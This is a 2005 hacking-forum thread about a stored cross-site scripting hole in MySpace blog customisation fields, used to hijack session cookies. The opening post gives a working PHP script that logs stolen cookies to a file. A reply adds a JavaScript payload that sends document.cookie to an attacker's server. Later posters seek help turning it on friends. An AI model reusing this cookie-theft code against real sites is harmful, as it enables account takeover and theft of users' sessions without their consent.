MySpace XSS & cookie hijacking

rmpants · **Posted:** Thu Jul 07, 2005 2:30 pm

Alright, I was going to post...But the server keeps screwing up with my post...Lets try it again...(I think it had to with the script tags...)

I figured this out today, and contacted myspace about the problem. Who knows if they'll fix it. I felt like sharing.

The problem is with the customize a blog section, you can use those fields to insert <.script> and <./script> thus allowing us to jack cookies. I came up with the following simple PHP code to receive the cookies.

Code:

//monster.php - eat some cookies up and digest into cookies.txt
//cookies are teh yummy!

$cookie = $_GET['taste'] . "\n";

$fp = fopen("cookies.txt", "a");

fwrite($fp, $cookie);

fclose($fp);

echo "Thanks for your cookies. :)\n";

As for the JavaScript, it's the standard document.location and document.cookies properties...

I'm not sure exactly which field it is on the customize my blog section, as I was just being lazy and filling each one up with the JS. They filter out input pretty well for the profile page.

I have yet to use this for malicious use, and don't plan to start on it. In theory having the users cookies should allow you to be them to the myspace server. Any input would be greatly appreciated. Thanks

burningfire · **Posted:** Fri Jul 08, 2005 3:40 am

Well, your proof-of-concept code is not as detailed. You would have to send it to an attacking server something like this:

Code:

window.location = "http://attackers_server/cookieMonster.php?taste=" + document.cookie

Otherwise, good stuff.

FrAnKeH · **Posted:** Fri Jul 08, 2005 4:15 am

He may have left it out to stop copy-and-paste kiddies

burningfire · **Posted:** Fri Jul 08, 2005 4:19 am

I guess I gave the script kiddies five less minutes of work to do.

XSS vulnerabilities are pretty common just have to probe every single input possible and you might find something.

aldend123 · **Joined:** Fri Jan 07, 2005 3:26 am **Posts:** 18

curious: they fix it yet?

rmpants · **Posted:** Fri Aug 05, 2005 4:39 pm

No idea. Give it a try.

aldend123 · **Joined:** Fri Jan 07, 2005 3:26 am **Posts:** 18

id love to but im not even good enough to be a script kidde

I'm workin on learning though...

also, the customize a blog section's HTML area says at the bottom now * no <.script><./script> tags (minus the .)

since i know a ton of people who use myspace ( i refuse. plus i dont have the time to spent on it ) I said well it sure would be a good prank to pull on some friends and a good excuse to learn. Dont worry i wasnt looking to wreak havoc and wonton violence.

Anyways, perhaps you could help me out?
You inspired me to learn some PHP and i did a little learning and understand most of the script. however i dont get : _GET calls apon the friendid, so i'd replace taste with friendid but if I'm logged in, isnt it calling myself, so Id end up getting my own cookie? or can i put in 'friendid=xx'?
Is burningfire's information given the only missing piece or is there more I'm missing? And i have no idea how burningfire's code given works into all this but thats probably cause i havent learned javascript with cookies, so thats next on the list.

noelcantona · **Posted:** Sat Oct 22, 2005 1:13 am

rmpants,

Did you do it? :lol:

http://securityfocus.com/brief/18

cheers,

psychotic · **Posted:** Sat Oct 22, 2005 3:41 am

Also: [ http://forum.hackinthebox.org/viewtopic.php?t=10234 ].

beautifullybroken · **Joined:** Wed Sep 13, 2006 1:35 am **Posts:** 1

hi i'm new at this and i need some help with the whole myspace thing...so anyone willing to help me out a little..please let me know :wink:

Hack In The Box Forums

MySpace XSS & cookie hijacking

Who is online